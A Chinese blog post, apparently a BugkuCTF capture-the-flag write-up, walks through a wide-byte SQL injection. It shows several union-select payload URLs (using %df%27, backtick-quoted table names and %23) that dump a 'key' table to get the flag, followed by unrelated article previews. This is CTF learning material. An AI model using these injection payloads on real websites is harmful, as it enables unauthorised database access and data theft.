BugkuCTF sql注入
前言
写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~
点开链接一看
很明显可以看出查询key表,id=1的string字段
我们去构造payload:
http://103.238.227.13:10083/index.php?id=-1%20union%20select%201,string%20from%20%27key%27%20#
我们发现没有出来 ,诶,怎么什么都没有了 ,继续重头开始 ,看一下是什么注入
发现id=1和id=1’都没错,这时候我们想起了宽字节注入 ,试一下
果然是这个样子,有关宽字段的讲解可以参考这里。
那么就好了构造payload:
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from 'key'#
报错,我们可以知道是引号的问题 ,那试一下另一种引号
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`#
这种引号在tab键的上面
发现还报错 ,才想起来了可能是#的问题 把#改成%23试试看
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`%23
直接爆出了key,这应该是我们需要的flag
您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力。thx.
微信打赏
支付宝打赏
作 者: Angel_Kitty
出 处:http://www.cnblogs.com/ECJTUACM-873284962/
关于作者:潜心机器学习以及信息安全的综合研究。如有问题或建议,请多多赐教!
版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文链接。
特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我
声援博主:如果您觉得文章对您有帮助,可以点击右下角【推荐】推荐一下该博文。您的鼓励是作者坚持原创和持续写作的最大动力!

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
如何快速学习大数据挖掘分析(个人观点)
本文梳理了学习大数据挖掘分析的思路和步骤,为大家提供了一些参考,希望能对大家有所帮助。 最近,很多人都咨询过,想学大数据,但不知道怎么开始,在哪里开始学习,需要学什么东西?对于初学者来说,学习大数据挖掘分析的逻辑是什么?本文从0开始梳理如何学习大数据挖掘分析和学习步骤,并给出一个学习建议。 希望可以帮助到大家 很多人认为数据挖掘需要掌握复杂、深刻的算法,掌握数据挖掘技术和分析技术是很有必要的。如果你钻研复杂的算法和技术开发,你只会让自己发疯,而且会越来越难。在公司的实际工作中,最好的大数据挖掘工程师必须是最熟悉和理解的人。对于大数据挖掘的学习,笔者认为学习数据挖掘必须结合实际的业务背景和案例背景进行研究,这是一种面向问题的学习方法。因此,一般来说,大数据挖掘分析的经典案例如下: 预测用户在下一段时间内是否会丢失或丢失。 该公司做了一个促销活动来预测活动的效果以及用户如何接受它。 评估用户的信用度。 细分现有客户市场,哪些客户是目标客户? 产品投放市场后,用户转换率和哪种运营策略最有效? 运营已经做了大量的工作,公司资源也投入了很多,如何提高产品投入产出比; 有些用户购买大量商品,哪些商...
- 下一篇
Java高并发秒杀Api-业务分析与DAO层构建1
章节目录 1.为什么使用Spring+Spring MVC+Mybatis 2.秒杀业务特性 3.秒杀分析过程、优化思路 4.相关技术介绍 5.基于Maven创建项目 6.秒杀业务分析 7.秒杀事务的难点分析 8.实现秒杀的哪些功能 1.为什么使用Spring+Spring MVC+Mybatis 框架易于使用、轻量级 对业务代码侵入性低 成熟的社区与资料 2.秒杀业务特性 秒杀业务场景具有典型的"事务"特性 秒杀、红包类需求越来越常见,对竞争资源的访问 面试常问的问题 3.相关技术介绍 MySQL 表设计 SQL技巧 事务、行级锁 MyBatis DAO层设计与开发 MyBatis 合理使用 MyBatis 与 Spring整合 Spring Spring Ioc 整合Service Spring 声明式事务使用 Spring MVC Restful 接口设计与使用 框架运作流程 Controller 设计技巧 前端 交互设计 BootStrap Jquery 高并发 高并发点和高并发分析 优化思路并实现 4.基于Maven创建项目 1.maven命令创建web项目骨架 mvn ar...
相关文章
文章评论
共有0条评论来说两句吧...